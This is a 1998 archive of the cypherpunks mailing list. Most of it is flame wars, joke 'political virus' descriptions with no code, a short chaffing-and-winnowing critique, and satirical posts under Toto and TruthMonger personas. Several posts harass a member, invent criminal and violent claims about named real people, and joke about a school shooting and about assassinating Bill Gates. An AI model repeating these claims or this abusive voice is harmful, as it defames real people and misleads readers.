  senatorlott@lott.senate.gov
Richard Shelby
  senator@shelby.senate.gov 
Charles Robb
  Senator_Robb@robb.senate.gov
Jim Lehrer
  newshour@pbs.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill <webmaster@canes.gsw.peachnet.edu>
Date: Tue, 24 Mar 1998 05:51:26 -0800 (PST)
To: "<cypherpunks@toad.com>
Subject: Hello
Message-ID: <3517B886.3C3F@canes.gsw.peachnet.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hey Stan, how is the MLM business.
Oh, lets not forget the adult WebSites also.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Tue, 24 Mar 1998 10:43:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199803241834.KAA21637@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


>Hey, I requested off this list ages ago.  
>Why don't you simply pull my
>subscription and we'll ALL be happy?  :-)

>Stan
        
Because we are all laughing at you, 
you stupid bastard.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Tue, 24 Mar 1998 07:41:11 -0800 (PST)
To: whgiii@invweb.net
Subject: Re: Or is it Pat Robertson?
Message-ID: <329a5276.3517d3ec@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-24 06:43:54 EST, whgiii@invweb.net writes:

<< > Hmmm Louis Farakan school of Number Theory >>
 
 >Hmmm, didn't seem to bother you when the same theory was used against
 >Bill Gates!  Not surprized, the response came from, you guessed it
 >cypher's, another paranoid "Know-nothing" -
 
 Yes Stan and you are here to "save" us all. >>

And what planet are you on?  I'm hear as the result of a big war I had with a
moderator.
 
<< Twit. >>

William seemed to accurately sign-off this time!   :-)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Tue, 24 Mar 1998 07:41:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Stan the Asshole
Message-ID: <b23d9cf6.3517d3ee@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-24 09:06:28 EST, mixmaster@remail.obscura.com writes:

<< Stan is an asshole, an annoyance on this list. I've 
 killfiled anything with his email address in any 
 header. I suggest everyone do the same. When he gets 
 no responses to anything he posts, he will eventually 
 go away, probably to where "Liberals Go To Die." If 
 you encourage him, I won't see your responses.  I 
 don't wade through the blizzard of this list to have 
 to wipe splashes of airhead liberal shit out of my 
 eyes at every other step.
 
 GodILoveFiltersMonger II >>

Hey, I requested off this list ages ago.  Why don't you simply pull my
subscription and we'll ALL be happy?  :-)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Tue, 24 Mar 1998 12:23:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199803241852.KAA23337@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


...and then there is the "StanSquncr" virus that prompts you
to pawn your computer for a $20 crackrock.  Two hours later,
you find yourself on a street corner sucking dick for $5 rocks.


I'm your REAL daddy, Stan.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Tue, 24 Mar 1998 08:23:34 -0800 (PST)
To: newshour@pbs.org
Subject: Re: McKinney fax
Message-ID: <80685716.3517dd42@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-24 11:02:35 EST, billp@nmol.com (of the cypherpunks)
writes:

<< We believe that bureaucrats, court clerks and judges should follow the laws
of the United States of America and properly perform their jobs. >>

We (if I speak for others on the cypherpunks list, that is (I'm a guest))
believe that the laws Bill is talking about, is the "Constitution of the
United States of America/Bill of Rights"

For instance, Article VI part 3 - 

"3 The Senators and Representatives before mentioned, and the members of the
several State Legislatures, and all executive and judicial officers, both of
the United States and of the several States, shall be bound by oath or
affirmation, to support this Constitution; but no religious test shall ever be
required as a qualification to any office or public trust under the United
States."

" ... but no religious test shall ever be required as a qualification to any
office or public trust under the United States."

And, to the pbs newshour, we (with same exclusion as above) believe that YOU
need to get a true voice from the left for your panels.  Sheilds only speaks
from a left POV 'some of the time' (and it  ain't enough of the time.)

And to Senator Lott - 'Have a happy father's day!'  (President Clinton)

Stan Rosenthal, 

FreeGroup - "Just Say It!"
http://members.aol.com/WhatsMetaU/freegroup.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Tue, 24 Mar 1998 08:21:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: 'Virus Alert!' or 'Re:Stan the Savior?'
Message-ID: <44e3dc96.3517dd54@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


whgiii@invweb.net - << Yes Stan and you are here to "save" us all. >>

If you look up in your definition of the word "save", maybe, EXCEPT, there's
bound to be at least a couple of people on this list that don't need saving.
;-)

But really, what I'm here to save, is your computers -
========
Subj:  What if -
God and SuperMan got into a fight - no, I found this on a Rush newsgroup -
-----------------------------
Subject: If Rush was a computer virus...
From: lotus@hogpe.ho.att.com (-R.CAPIK)
Date: 21 Mar 1996 17:16:10 GMT

What if there was a Rush Limbaugh computer virus. What might it do? What about
some other political figures... ?

Ron Capik [aka: the NJ Editorial Minstrel ]
-----------
Forbes virus:       Makes all your programs give 17% of their resources back
to your system. We have no idea what the system will do with the resources.
(Only applies to earned resources.)  At a cost of millions (in un-earned
resources), the virus runs for a short time then quits.  <see Perot virus>

Buchanan virus:     All your icons move to the far right of your screen.

Bill Clinton virus: Your pointer jumps back and forth across the middle of the
screen, seems to drift to the left and you can't seem to pick any programs. If
you have a sound card you may hear the sound of rushing [white] water.

Limbaugh virus [aka: ditto virus]:     All icons line up under the Rush icon
where ever it may go.

Bill Clinton #2     Icons turn purple and explode. (May be triggered by
conservative input)

Dole virus:         We don't quite know what it may do, but it seems to have
been in the system for a very long time. May cause system to enter sleep
cycle.

Perot virus:        Ran for a short time in 92 then quit. It may also be
active for a short time in 96. May cause space alien problems with daughter
programs.

Hillary virus:      Causes text to appear on your screen years after you lost
it.  May trigger "Bill Clinton #2" virus.  May also cause rushing [white]
water sound.
----------
What if, Stan had written those virus descriptions? - 

Buchanan virus [aka - "Sap" (of the 'Family (Values) Tree')]:     All your
icons move to the far right of your screen, and then, any icon that depicts a
face gets covered up by a white coned shape hat (and sheets, if the icon is of
a whole person).  The rest of the icons turn into pitch-forks, and swastikas.
The (now) covered 'people' icons then grab the 'pitch-fork' icons, and run off
the *extreme* right side of the screen.  The swastikas remain on your screen,
and cannot be removed, for they are burned into the phosphor.  Your computer
then logs on to America OnLine, goes to the 'government' forum, and then the
(now) covered 'people' icons return (in groups), with the 'pitch-fork' icons,
to the screen, and start attacking America (OnLine), starting with the
'government' (forum). The instant the Buchanan virus infects your computer, it
attempts to kill all forms of the 'Jerusalem' virus (but it never gets them
all).  

Limbaugh virus [aka - "Whiner"]:     All icons line up under the Rush icon
wherever it may go.  As soon as 'Limbaugh' infects your computer, it (along
with any other virus that will join it) attempts to kill the 'Clinton' virus,
and the 'Hillary' virus (but doesn't succeed, only weakens them temporarally,
then they become much stronger, and impossible to remove for another '4 More
Years!').  Then it starts attacking any other viruses 'Limbaugh' thinks is
vulnurable, including the viruses that had joined it in attacking the
'Clinton' viruses.  The only viruses that the 'Limbaugh' virus has been know
to truly rid your system of, though, is the 'Limbaugh' virus, and the virus'
that believe that the 'Limbaugh' virus is a 'truth detector' type virus, or
that the 'Limbaugh' virus is on 'loan from god', etc.  The 'Limbaugh' virus
self-destructs after 7 or 8 years (and it can't understand why).  
 
Gingrich [aka - "KingRich" (King of the Rich)]:     This virus affects
applications that have an ability to recreate previous commands given to that
application while editing a document of that application, using a 'history' or
'undo' command.  'KingRich' attaches itself to the 'history' files, and
selectivly changes certain portions in it.  So if you make a mistake, and you
need to go back and recreate your file before your mistake, you can still go
back, but you'll probably find the icons that represent your best work that
you had placed on the left side of your screen, now on the right of it, and
those icons that open your worst work, and previously placed on the right,
you'll now find that on the left.

Gingrich #2 [aka - "CryBaby"]:      This virus goes to the back of your pci,
vesa,16bit, or 8bit bus, and makes your hard drive make a real loud 'whining'
noise and your soundcard starts making a 'crying' sound through your audio
setup or speakers.  On your screen, 'CryBaby' places the message "I'm going to
shut the system down because I had to go to the back of the bus!", and it
causes your computer to go into 'default' (meaning, it causes you to lose your
CMOS memory, and it restarts with power-on 'defaults').

And we now know what the Dole virus will do -

Dole virus [aka - "Quitter"]:  This virus attacks your hard drive, causing it
to make a real loud 'whining' noise.  Then it quits, and you never have to
worry about it again.

To learn how to detect and remove these viruses from YOUR system, register at
- 

What's A Meta U (and What's It 2 U?)
http://members.aol.com/WhatsMetaU
=====
Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMongrel <tm@dev.null>
Date: Tue, 24 Mar 1998 15:21:57 -0800 (PST)
To: webmaster@eads.com
Subject: Your courageous stance...
Message-ID: <35184081.7CF5@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


I would like to congratulate and thank you for the courageous stance
that you
have taken by doing your part to help stop the spread of anarchistic and
possibly
illegal content on the InterNet by denying access to those who use the
freedom
and rights granted them by the Constitution to abuse those privileges.

  Your stance is particularly admired by those of us who share your
interest in
preventing the spread of free access to all types of information, in
light of the
fact that you have not shied away from persecuting those connected with
the
Circle of Eunuchs, thus possibly putting yourself, your family and your
business
in physical danger, as well as virtual danger.
  Given the current dissension within the ranks of the Cirle of Eunuchs
and the
Army of Dog, concerning whether their assault on censorship and censors
should
be consumated in CyberSpace or MeatSpace, there are few who are willing
to put
themselves in the line of fire to support the same ideals that other
great
Americans, such as Senator Joe McCarthy and J. Edgar Hoover, have
championed.

  Regardless of the possible physical danger you will be subjected to if
the
proponents of MeatSpace retruibution to censorship supporters win out in
the
current battle for control of the resources of the Army of Dog, your
choice
to submit to government oppressors and legal threats is likely the right
one,
since the government currently has more and better armed thugs than
those
who oppose them.

TruthMonger III
"Ain't no safety this side of the grave...never has been...never will
be."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Sender <nobody@privacy.nb.ca>
Date: Tue, 24 Mar 1998 14:00:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Chaffing and Winnowing
Message-ID: <b140a672fbd87f72ae59bcaf81a6c8ae@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain


Aside from the considerable overhead created by C/W,
I observe a possible pitfall. suppose I start every
new message at ID# 0. The first time I C/W a message
everything works fine. The next time I C/W a message
with the same MAC, I give some very juciy clues to
what both messages were. This is because the item that
the MAC applied to was an ID number and a bit. well, that
bit is either zero or one... so any bit that corresponds
between my first and second message will yield an identicle
MAC, thus making it easy for anybody to seperate some of 
the wheat from the chaff, merely by simple observation.
though in a real implementation, I probably wouldn't be so
niave as to start every new message with the same packet
ID, I point out that there's an upper limit on the amount of
data that should be transmitted before a new
authentication key should be arranged... that is assuming that
the ID field was of finite size. Rivest mentioned in passing
using a 32 bit ID. That's an impressive number of bits to
C/W, but certainly not unattainable.

-SM2k





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tm@dev.null>
Date: Tue, 24 Mar 1998 16:22:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Kill 'em all...*I'll* sort 'em out...
Message-ID: <35184DF7.2497@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


-----	Forward from TruthMonger III	-----

I would like to congratulate and thank you for the courageous stance
that you have taken by doing your part to help stop the spread of 
anarchistic and possibly illegal content on the InterNet by denying 
access to those who use the freedom and rights granted them by the 
Constitution to abuse those privileges.

  Your stance is particularly admired by those of us who share your
interest in preventing the spread of free access to all types of 
information, in light of the fact that you have not shied away from 
persecuting those connected with the Circle of Eunuchs, thus possibly 
putting yourself, your family and your business in physical danger, as 
well as virtual danger.
  Given the current dissension within the ranks of the Cirle of Eunuchs
and the Army of Dog, concerning whether their assault on censorship and 
censors should be consumated in CyberSpace or MeatSpace, there are few 
who are willing to put themselves in the line of fire to support the 
same ideals that other great Americans, such as Senator Joe McCarthy and 
J. Edgar Hoover, have championed.

  Regardless of the possible physical danger you will be subjected to if
the proponents of MeatSpace retruibution to censorship supporters win 
out in the current battle for control of the resources of the Army of 
Dog, your choice to submit to government oppressors and legal threats is 
likely the right one, since the government currently has more and better 
armed thugs than those who oppose them.

TruthMonger III
"Ain't no safety this side of the grave...never has been...never will
be."

---- End of Alleged Forwarded Message -----

  Despite the fact that the missive you are currently reading is an
obvious forgery, I, Timothy C. May <tm@dev.null>, would like to exhort
all of my fellow victims of forgeries by the DogMeister@Sympatico to
form their own Cult of One chapter of the Army of Dog.
  Unless each and every individual who is concerned with gaining the
liberty to exercise the basic rights and freedoms which come from
being a unique participant in the universe which has formed them
(and which they have had a hand in forming) steps forward to demand
the right to exercise and manifest their values and beliefs in
MeatSpace, as well as CyberSpace...uuhhh...has anybody seen my
shoes?

"We have met the future of rEvolution, and it is us."
~ Ogop

  Due to the heavy investment I have made in MeatSpace weaponry, I will
be supporting the factions of the Army of Dog which are promoting a
physical war against the enemies of freedom, but I recognize that those
whose investment is in newer warfare technologies have an equal right
to fight the battle within the slightly more infinite boundaries of
Digital Reality.

"The screens of freedom must occassionally be refreshed with a GUI-
 supported blood-color of digital martyrs."
~ AGuyTooLazyToLookUpTheOriginalQuote

  Despite the concerns of some members of the Cypherpunks Distributed
Mailing List about the forged attributions of the DogMeister concerning
the beliefs and stances of various individual list members, we all know,
deep down inside, that Janet Reno's secret lover, Officer Furhman, is
right when he whispers in her ear during their fuckmaking (in a manner
that is a felony in the majority of states, which is why they only do
it in Federal offices), "The CypherPunks may not be guilty of the
crimes that TruthMongrel attributes to them, but they are all guilty
of *something*..."

Timothy C. May <tm@dev.null>
"There is something 'Wong' when I have to send 'chop, chop' messages
 to an increasing number of posters to the Cypherpunks list."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Tue, 24 Mar 1998 15:40:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:Stan the Human!
Message-ID: <d02e4d54.35184418@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-24 16:09:52 EST, mixmaster@remail.obscura.com writes:

<< >Hey, I requested off this list ages ago.  
 >Why don't you simply pull my
 >subscription and we'll ALL be happy?  :-)
 
 >Stan
         
 Because we are all laughing at you, 
 you really smart guy.   >>

Hey, I got my laughs too!

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMongrer <tm@dev.null>
Date: Tue, 24 Mar 1998 17:21:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: CIA Trained Gorilla Femnists
Message-ID: <35185C90.418F@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Male Gorilla, Released to Mate
               with Females, Drops Dead

               AP
               24-MAR-98

TOKYO (AP) The excitement, or perhaps the pressure, apparently was too
much for Sultan. The 28-year-old male gorilla, specially moved to a 
cage to mate with three females, instead dropped dead. 

The 400-pound lowland gorilla ran around briefly and played with his 
new friends Monday, then suddenly collapsed, apparently after suffering 
a heart attack, said Kunihiko Yasui, head of animal breeding at Kyoto 
Municipal Zoo.

~~~

Reports from non-mainstream news sources indicate that one of the
female gorillas was carrying an umbrella which was nowhere to be
found when invesigators searched the cage after the mysterious
death of the male gorilla.
Gertrude Stein, denying that an elite corps of techno-femnists
is involved with providing CIA BlackOps training for female
subjects of a digital-implant experiment being conducted by
the NSA, merely said, "What is good for the goose is not always
necessarily good for the gorilla."

Anonymous sources from the CypherPunks Distributed Mailing List
indicated that the assassination was coordinated by Blanc Weber,
a list member who disguises her hidden agenda of MeatSpace 
violence by constantly admonishing list members for expressing
the results of the excessive male hormones surging through their
potential-rapist bodies.
The sources cited Weber's previous support of Zsa-Zsa Grubor as
proof of her involvement with radical femnist movements whose
goals are secretly financed by Wonder Bra, Wonder Woman, and
Wonder Bread.

Mainstream media sources continue to claim that this post is 
nothing more than the psychotic babblings of a FrostBack To
Be Named Later. However, this view is obvious in error, or an
intelligent person such as yourself would not stil be reading
this post, eh?

TruthFemnist,
"And, after my operation, I will learn to spell 'feminist' correctly."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Tue, 24 Mar 1998 16:59:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Kill 'em all...*I'll* sort 'em out...
Message-ID: <c36290b.351856c1@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-24 19:48:49 EST, tm@dev.null writes:

<< -----	Forward from TruthMonger III	----- <SNIP!>
 
 I would like to congratulate and thank you for the courageous stance
 that you have taken by doing your part to help stop the spread of 
 anarchistic and possibly illegal content on the InterNet by denying 
 access to those who use the freedom and rights granted them by the 
 Constitution to abuse those privileges.
 
   Your stance is particularly admired by those of us who share your
 interest in preventing the spread of free access to all types of 
 information <SNIP> concerning whether their assault on censorship and 
 censors should be consumated in CyberSpace or MeatSpace, there are few 
 who are willing to put themselves in the line of fire to support the 
 same ideals that other great Americans, such as Senator Joe McCarthy and 
 J. Edgar Hoover, have championed. >>

Ah yes, fits like a lock and a key.  Pro-censorship guys also being pro
McCarthy guys!  After all, these "Know-nothings" today, are the 'Modern
McCarthyites' (see my political page)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Tue, 24 Mar 1998 17:48:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Welcome to cypherpunks-unedited
Message-ID: <44e512a9.35186235@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-24 19:18:48 EST, Majordomo@toad.com writes:

<< Cypherpunks assume privacy is a good thing and wish there were more of it.

Cypherpunks acknowledge that those who want privacy must create it for
themselves and not expect governments, corporations, or other large, faceless
organizations to grant them privacy out of beneficence.  Cypherpunks know that
people have been creating their own privacy for centuries with whispers,
envelopes, closed doors, and couriers.  Cypherpunks do not seek to prevent
other people from speaking about their experiences or their opinions. >>

I agree with all that.

 
<< ...  Cypherpunks love to practice.  They love to play with public key
cryptography.  ... >>

But when it's used as simply a means of identifying yourself on a public list,
is that really privacy protection?  Seems like a mis-use of the technology to
me.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 24 Mar 1998 19:08:24 -0800 (PST)
To: randlev@worldnet.att.net
Subject: Expert Testimony [ATTN: Donald C. Randolph, Esq.]
Message-ID: <3518739A.1700@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Re:
>Kevin
>Mitnick is seeking a highly credentialed expert in computer security,
>telecommunications, system and network administration to testify 

Mr. Mitnick & Mr. Randolph,
  If you desire, I can put you in contact with an individual who has
not only been described as 'The World's Foremost Computer Expert' in
a variety of computer manuscripts and journals dating as far back as
1989, but who would also be willing to testify as to his personal
involvement in the ethical violation of a plethora of MeatSpace laws
in the last few decades during his activities in CyberSpace.
  I am speaking of C.J. Parker.

>Qualified candidates must have an advanced degree and be knowledgeable 
> in DOS, Windows 3.ll, Unix (SunOs & Solaris), VAX/VMS, and Internet
>operations.  Experience with cellular telephone networks is a plus.

  Mr. Parker holds an MBA which was obtained through an accelerated
degree program known as 'hacking,' and can provide transcripts to
verify his being awarded several 'honors' awards by a recognized
institution of higher education.
  He has been involved in top levels of the business and educational 
arenas of the computer industry for the better part of a decade, and
has not only worked with all variety of operating systems and programs,
but also has access to a variety of individuals whose knowledge and
expertise encompasses a range of the industry which is nothing short
of phenomenal.

  Mr. Parker is a co-author of a variety of manuscripts concerning
computer and digital communications issues which were only recognized 
as significant years or decades after his treatment of them.

  The fact that Mr. Parker is certifiably insane in no way dimishes
the accomplishments that he has succeeded in bringing to fruitation
as the president of an international computer company, and as an
outlaw who was spitting in the face of authority since Mr. Mitnick
was wetnursing.

  If you are interested in providing your client with a defense
which will be recognized as sane and competent, then you would be
well advised to ignore my offer.
  If you wish for your client to successfully resist the efforts
of the government to make him a scapegoat for the deficiencies
of the InterNet entities whose resources he shared based upon
his own values and beliefs, then you would be well advised to
further explore my offer.

  In short, Mr. Parker is not currently facing charges for the
same activities that have been committed by your client.
  Think about it.

~~~~
Toto
~~~~
"The Xenix Chainsaw Massacre"
http://bureau42.base.org/public/xenix
"WebWorld & the Mythical Circle of Eunuchs"
http://bureau42.base.org/public/webworld
"InfoWar"
http://bureau42.base.org/public/infowar3
"The Final Frontier"
http://www3.sk.sympatico.ca/carljohn





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 24 Mar 1998 19:29:08 -0800 (PST)
To: "Brian B. Riley" <brianbr@together.net>
Subject: Re: Is That  A Balck Helicopter Up There?
In-Reply-To: <199803250236.VAA05942@mx02.together.net>
Message-ID: <35187AA6.3AC4@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Brian B. Riley, who snuck into the WhiteHouse, put on a Bill Clinton
 halloween mask, and raped Mona Lewinski, wrote:
 I honestly don't know if I would be too paranoid to say that the
government is behind all these happenings, I really don't like the
territory that takes us to; but they most surely are quick to exploit
them for the own agenda ... it seems now that every untoward incident
that happens is hopped upon by some goverment official or goverment
schill as an excuse to shorten the leash ... 
~~~

Brian,
  The power of your posts resides in the fact that you do not beat the
drum for a totally paranoid view of reality, yet you allow room for
that view, just the same.
  To claim that the children who recently killed a number of their
fellow students during a false fire-drill were encouraged by the
government in order to draw attention away from the '48 Hours' show
on government involvement in the murder of Dr. Martin Luther King
would be a stretch. On the other hand, the issues being debated by
the '48 Hours' special would have been considered a stretch at the
time of the event, despite the fact that they are well supported by
information that has been wrested from the grip of secrecy in the
time since then.

  The bottom line is that we currently live in a society whose view
of reality has been formed/programmed by the media/medium of TV.

"Watch me and I'll bleed you, 'cause you eat the shit I feed you.
  ~ Frank Zappa & the Mothers of Invention

  The danger of the Sheeple being misled by false conspiracy theories
propogated by the Fringe Media (TM) is small compared to the danger
that they will continue to be misled by the Reality (TM) being spammed
deep within the programming centers of thier minds by a mainstream
media which feeds at the same trough as FBI snipers and Marine units
whose motto seems to be "My country, wrong or wrong..."

  My career as a would-be shit-disturber and troublemaker pales in
comparison with the inevitable leakage that occurs around the edges
of the Official World View (TM) propagated by those who employ the
gatekeepers of the Media Feeding Pen and the Dogs Of Whore whose
teeth ensure that the Sheeple will not stray from their appointed
destiny.

Toto <or_so_I_would_have_you_believe@it's_a_trick!.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 24 Mar 1998 20:58:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Playboy Channel Implicated In Arkansas School Massacre!
Message-ID: <35188F7B.54BD@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


The governor of Arkans(redneck)as(sholes) has stepped forward to
lay responsibility for the latest school massacre tragedy squarely
on the shoulders of those elements of the entertainment media who
have not thus far been implicated in the political shennanigans and
illegal drug deals perpretrated by the former governor of Arkansas,
who is currenly dipping his dick in those entering the Whitehouse
through the 'Ladies Only' entrance.

  It seems that responibility for the massacre lies in the current
social acceptance of the licentious violence being spammed upon the
public by the immoral profitmongers of the entertainment industry.
  This is in marked contrast to the current social acceptance of the
licentious violence being spammed upon the public by the moral
profitmongers of the Biblically-based religion industry.

  It is obvious that new laws will have to be passed to protect the
children exposed to the sex and violence contained in the Christian
Bible from being further influenced by corresponding material in the
secular sector of society.

SpermMonger
"Spilling my seed on the ground since puberty."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 24 Mar 1998 20:04:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: EMI and TWA 800
Message-ID: <199803250404.XAA02816@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The April 9 New York Review of Books has published a long 
special supplement, "The Fall of TWA 800: The Possibility
of Electromagnetic Interference," by Elaine Scarry, a noted author
and Harvard professor:

   http://jya.com/twa800-emi.htm  (128K with 3 images)

The article closely examines the possibility of electromagnetic
interference in TWA 800's controls, comm, and black boxes
by activities of the ten US military planes and ships in the
vicinity which were heavily equipped for electronic warfare 
and were conducting tests of the gear. 

It is reports on what is publically known about the EM armaments
of planes and ships in the vicinity, about secret EM weapons and 
defenses, the several dozen military and commercial planes that 
have crashed due to EMI, military studies of long-standing EM 
hazards which will not be released to crash investigators, current 
research in EMI and what scientists in the field think about the 
possibility of EMI causing the fall of TWA 800.

It calls for the military to release its classified EMI research to
NTSB investigators, and short of that, for the servicemen and 
women on the planes and ships at the scene to tell what they 
know. It asks Congress to order military cooperation.

Not at all inflammatory or accusatory, it is thoroughly researched 
(over 100 notes and citations) and highly informative on the 
hazards of EMI, and worthy of ciritque by learned scientists 
in the field here.

Coda: Ron Brown's crash is not mentioned but its characteristics 
fit several other EMI accidents for which the military will not
release findings, claiming that national security EM weapons
secrets would be jeopardized.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bienfait Nutly News <bnn@dev.null>
Date: Tue, 24 Mar 1998 21:25:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Arkansas Chainsaw Massacre
Message-ID: <351895E1.2130@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


[Bienfait, Saskatchewan] AT A LATE-NIGHT CELEBRATION AT THE COALDUST
Saloon, members of the MeatSpace Revolutionary Arm of the Army of Dog
congratulated one another on the success of 'Operation FireDrill.'

Although their efforts to promote their violent interpretation of
'The True Story of the InterNet' manuscripts was somewhat dampened
by the fact that their young pawns did not have the strength to
pull-start the excessively large Stihl chainsaws they were provided,
and had to resort to conventional arms, the mission was still seen as
a success.
Defcon McCullagh Chainsaw, a violent terrorist who has managed to
infiltrate the mainstream media as a respected correspondent, said,
"The twisted spin that the citizens of this Bible-(spare the)Belt(spoil
the child) community will put on this tragedy will no doubt increase
the Sheeple's call for stronger censorship and repression of expression,
which will not only provide me with more material for my ineffective
columns pissing in the wind generated by the Moral Majority, but will
also hasten the MeatSpace rEvolution that will arise in response to
the unconstitutional limits which the government will impose on the
citizens under cover of the associated propaganda spewn out by their
pawns in the mainstream media."

A spokesperson for Pat Buchanan, dodging questions regarding the rumors
that the Moral Majority was snookered by the Army of Violent Dogs into
financing the operation, said, "I have no comment, except to note that
tomorrow I will release a statement clarifying what I would have 'meant
to say' during this press conference, if I had, in fact, said anything
beyond, 'No comment.'"

In a private conversation with this reportwhore, God, on the condition
that he not be quoted, said, "Dog works in mysterious ways."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Potential Bill Gates Assassins Union (Local 709)" <pbgau@dev.null>
Date: Tue, 24 Mar 1998 22:53:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 13/0 -- SPACE ALIENS HIDE MY DRUGS!
Message-ID: <3518AA73.4569@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


TruthMonger Sells Out:

Subject: I Concede...
To: BadBillyG<billg@micro$not.cum>
From: TruthMonger<tm@dev.null>

Yo Willy,
  You finally whupped me...
  After years of plotting your death in a slow, excruciating manner,
time and circumstances have finally forced me to offer to compromise
my formerly unbending position regarding your continued physical 
existence.

  In my own defence, I must state that I probably could have held out
indefinitely in my crusade to force you to pay for the tremendous
amount of suffering that resulted from your successfully making DOS
a worldwide computer standard, despite the fact that children in
basements around the nation were producing vastly superior products,
such as 4DOS and AstroTit, had it not been for the fact that even
greater evil forces in the world aligned themselves against you,
behind ugly-as-sin schills such as Janet Reno, as opposed to sweethearts
such as Blanc Weber, who is your staunchest defender, despite the fact
that she is carrying Attila T. Hun's baby.

  The beginning of my downfall as a 'command-line kind of guy' was
when I was forced to trade in my XT with a 20M hard drive and 2M of
RAM because of the requirement of the only ISP available to me
that I be able to run Windoze.
  Up until then, I had been able to successfully hide my secret life
as a huge fan of M$ Word. After purchasing Win95, however, and
not having the character to deny myself indulging in the downloading
of a free copy of InterNet Assistant, my anti-M$ resolve deteriorated
rapidly, until I finally got fed up with Nut$crape's inability to
provide me with the instant gratification of my desire to have the
latest in software technology, despite the fact that it was a result
of your devious and predatorial business practices which made it so.
  As a result, I finally quit kidding myself about my ability to
resist joining the herd of Sheeple racing madly over the M$ cliff,
and I downloaded and installed M$ Exploiter.

  In recognition of the fact that I am now committed to a life of
addiction to the M$ updates being offered by shadowy characters on
dimly-lit street corners, I am willing to offer you a compromise
on my previous demands that you wipe that cute, shit-eating grin
off of your face so that I can assassinate you with a clear
conscience.
  To be honest, my current predicament is that, after purchasing
a variety of M$ products, I currently find myself unable to 
reinstall any of them if my system goes to shit, which it often
does as a result of my being a sorry, drunken, drug addict without
a lick of common sense.
  Although I own 3 1/2" floppy disks purchased in the late 1980's,
and which still work perfectly fine, the disks which I have
acquired recently, containing the M$ products I own, have all
gone to shit, because America has sunk to the point where they
not only cannot make a decent car, anymore, but they also cannot
make a decent floppy disk.
  
  Accordingly, I am willing to reduce my demands for your physical
extermination to a demand that you allow me to cut off three fingers
on your left hand, on the following conditions:
1. You provide me with CD-ROMS for Win95, M$ Word for Win95,
  Windows 3.11, and a copy of AstroTit, a program writen by
  some sorry loser in Sedona, Arizona, and which I lost because
  DOS 4.0 made me so fucking crazy that I threw my computer
  through a window in forty-below-zero weather.
2. You not tell the CypherPunks about this offer, since all of my
  somewhat deficient reputation capital rests upon my long-winded
